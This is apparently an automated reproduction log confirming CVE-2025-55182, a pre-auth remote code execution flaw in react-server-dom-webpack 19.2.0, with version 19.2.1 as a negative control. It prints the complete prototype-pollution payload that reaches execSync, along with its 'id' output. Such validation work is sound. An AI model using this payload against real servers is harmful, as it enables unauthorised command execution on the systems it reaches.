[22:37:01] WORK_DIR=/data/pruva/project-cache/51211364-54ec-4ede-84ca-461fd98c7300/repo
[22:37:01] ========================================
[22:37:01] PHASE 1: Vulnerable react-server-dom-webpack@19.2.0
[22:37:01] ========================================
[22:37:01] Installing packages for vulnerable (react-server-dom-webpack@19.2.0)
changed 3 packages in 1s
[22:37:03] Installed react-server-dom-webpack version: 19.2.0
[22:37:03] Vulnerable version loaded: 19.2.0
[22:37:03] === Starting test: vuln (react-server-dom-webpack@19.2.0) ===
[22:37:03] Server PID: 2185
[22:37:04] Health check passed: HEALTHY 19.2.0
[22:37:04] Running exploit against vuln...
[vuln] Sending exploit to http://localhost:31337/
[vuln] Marker file: /tmp/rce_proof_1782945421_2126.txt
[vuln] Payload field0: {"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\": \"$B1337\"}", "_response": {"_prefix": "process.mainModule.require('child_process').execSync('id > /tmp/rce_proof_1782945421_2126.txt 2>&1; true');", "_formData": {"get": "$1:constructor:constructor"}}}
[vuln] Exception (expected if server crashed from RCE): timed out
[vuln] *** RCE_CONFIRMED *** marker content: id: cannot find name for group ID 962
uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962)
[22:37:16] Exploit SUCCEEDED for vuln — RCE confirmed
[22:37:16] RCE marker (id output): id: cannot find name for group ID 962
uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962)
[22:37:16] Server log for vuln:
[server] react-server-dom-webpack version: 19.2.0
[server] decodeReply type: function
[server] Listening on port 31337 (19.2.0)
[server] POST received, Content-Type=multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad, Next-Action=x
[server] Body size: 520
[server] FormData keys: 0, 1
[server] Calling decodeReply (vulnerable deserialization path)...
[22:37:18] Vulnerable result: health=true rce=true
[22:37:18] Vulnerable RCE evidence (id output): id: cannot find name for group ID 962
uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962)
[22:37:18] ========================================
[22:37:18] PHASE 2: Fixed react-server-dom-webpack@19.2.1 (negative control)
[22:37:18] ========================================
[22:37:18] Installing packages for fixed (react-server-dom-webpack@19.2.1)
changed 3 packages in 1s
[22:37:20] Installed react-server-dom-webpack version: 19.2.1
[22:37:20] Fixed version loaded: 19.2.1
[22:37:20] === Starting test: fixed (react-server-dom-webpack@19.2.1) ===
[22:37:20] Server PID: 2293
[22:37:21] Health check passed: HEALTHY 19.2.1
[22:37:21] Running exploit against fixed...
[fixed] Sending exploit to http://localhost:31337/
[fixed] Marker file: /tmp/rce_proof_fixed_1782945438_2126.txt
[fixed] Payload field0: {"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\": \"$B1337\"}", "_response": {"_prefix": "process.mainModule.require('child_process').execSync('id > /tmp/rce_proof_fixed_1782945438_2126.txt 2>&1; true');", "_formData": {"get": "$1:constructor:constructor"}}
[fixed] Response status: 200
[fixed] Response body: {"success":true,"result":"[object Object]"}
[fixed] RCE_NOT_CONFIRMED — marker file does not exist
[22:37:23] Exploit did NOT trigger RCE for fixed (marker file absent)
[22:37:23] Server log for fixed:
[server] react-server-dom-webpack version: 19.2.1
[server] decodeReply type: function
[server] Listening on port 31337 (19.2.1)
[server] POST received, Content-Type=multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad, Next-Action=x
[server] Body size: 526
[server] FormData keys: 0, 1
[server] Calling decodeReply (vulnerable deserialization path)...
[server] decodeReply completed, result: [object Object]
[22:37:25] Fixed result: health=true rce=false
[22:37:25] ========================================
[22:37:25] SUMMARY
[22:37:25] ========================================
[22:37:25] Vulnerable: 19.2.0, health=true, RCE=true, id=id: cannot find name for group ID 962
uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962)
[22:37:25] Fixed: 19.2.1, health=true, RCE=false
[22:37:25] VERDICT: CVE-2025-55182 CONFIRMED — RCE in vulnerable, blocked in fixed
[22:37:25] Runtime manifest written
[22:37:25] RCA report written
[22:37:25] Validation verdict written
{
  "entrypoint_kind": "api_remote",
  "entrypoint_detail": "HTTP POST with Next-Action header and multipart/form-data body to react-server-dom-webpack decodeReply()",
  "service_started": true,
  "healthcheck_passed": true,
  "target_path_reached": true,
  "runtime_stack": [
    "node",
    "react-server-dom-webpack@19.2.0",
    "http-server"
  ],
  "proof_artifacts": [
    "logs/server_vuln.log",
    "logs/server_fixed.log",
    "repro/artifacts/request_vuln.txt",
    "repro/artifacts/response_vuln.txt",
    "repro/artifacts/request_fixed.txt",
    "repro/artifacts/response_fixed.txt",
    "repro/artifacts/rce_marker_vuln.txt",
    "repro/artifacts/server_vuln.log",
    "repro/artifacts/server_fixed.log",
    "logs/reproduction_steps.log"
  ],
  "notes": "Vulnerable 19.2.0 health=true RCE=true id_output=id: cannot find name for group ID 962\nuid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962); Fixed 19.2.1 RCE=false; Confirmed=true"
}
{
  "claim_outcome": "confirmed",
  "claim_block_reason": null,
  "repro_result": "confirmed",
  "validated_surface": "api_remote",
  "evidence_scope": "realistic_harness",
  "claimed_impact_class": "code_execution",
  "observed_impact_class": "code_execution",
  "exploitability_confidence": "high",
  "attacker_controlled_input": "HTTP POST multipart/form-data body with Next-Action header",
  "trigger_path": "POST / -> decodeReply() -> Flight protocol reference resolution -> prototype chain -> Function constructor -> execSync",
  "end_to_end_target_reached": true,
  "sanitizer_used": false,
  "crash_observed": false,
  "read_write_primitive_observed": true,
  "exploit_chain_demonstrated": true,
  "blocking_mitigation": null,
  "inferred": false
}
[22:37:25] Proof artifacts copied to project cache
[22:37:25] SUCCESS: CVE-2025-55182 reproduced — pre-auth RCE confirmed